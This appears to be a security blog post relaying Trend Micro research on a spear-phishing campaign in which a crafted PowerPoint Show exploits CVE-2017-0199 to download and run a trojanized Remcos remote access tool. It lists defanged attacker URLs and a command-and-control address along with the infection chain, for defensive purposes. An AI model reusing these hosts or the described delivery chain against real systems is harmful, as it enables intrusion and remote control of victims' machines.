New Malware Abuses PowerPoint Slide Show

In April Microsoft fixed the CVE-2017-0199  vulnerability in Office after threat actors had been exploiting it in the wild.The same vulnerability is now been found to be used hidden behind a specially crafted PowerPoint (PPSX) Presentation file.

CVE-2017-0199 was originally a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office to deliver malware. It is commonly exploited via the use of malicious Rich Text File (RTF) documents.

According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider and mainly targets companies involved in the electronics manufacturing industry.

Technical Analysis

The exploit arrives as a spear-phishing email attachment, purportedly from a cable manufacturing provider, that drops a remote access tool as its final payload.

Figure_02_spear-phishing-email

When the malicious PowerPoint Show is opened, it shows the text CVE-2017-8570, which is a different Microsoft Office vulnerability. However, based on our analysis, it actually exploits CVE-2017-0199 instead. This is a leftover mistake from the toolkit developer, which the sender did not choose to change.

The file triggers a script moniker in ppt/slides/_rels/slide1[.]xml[.]rels. The exploit runs the remote code at hxxp://192[.]166[.]218[.]230:3550/logo[.]doc, which is a VPN or hosting service that is abused by the attacker.

Figure_04_remote-malicious-code

If we run the sample, PowerPoint will initialize the script moniker and run the remote malicious payload via the PowerPoint Show animations feature.

Figure_06_ratman-exe

The logo.doc file is actually an XML file with JavaScript code that runs a PowerShell command to download and execute the file known as RATMAN.EXE (Detected by Trend Micro as BKDR_RESCOMS.CA). The executable is actually a trojanized version of the REMCOS remote access tool (RAT) from the Command & Control (C&C) server: hxxp://192[.]166[.]218[.]230:3550/ratman[.]exe, which is located in Poland. The 192[.]166[.]218[.]230address is also known to host other kinds of RATs. RATMAN.EXE then connects to the C&C server at 5[.]134[.]116[.]146:3550 for execution.

RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which when installed, allows attackers to control infected computers from its command-and-control server remotely.

Figure_07_remcos_rat_control_panel

Remcos is a legitimate and customizable remote access tool that allows users to control their system from anywhere in the world with some capabilities, like a download and execute the command, a keylogger, a screen logger, and recorders for both webcam and microphone.
Since the exploit is used to deliver infected Rich Text File (.RTF) documents, most detection methods for CVE-2017-0199 focuses on the RTF. So, the use of a new PPSX files allows attackers to evade antivirus detection as well.

The easiest way to prevent yourself completely from this attack is to download and apply patches released by Microsoft in April that will address the CVE-2017-0199 vulnerability.

Author: Cognore

Cyber Security Solution

One thought on “New Malware Abuses PowerPoint Slide Show”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s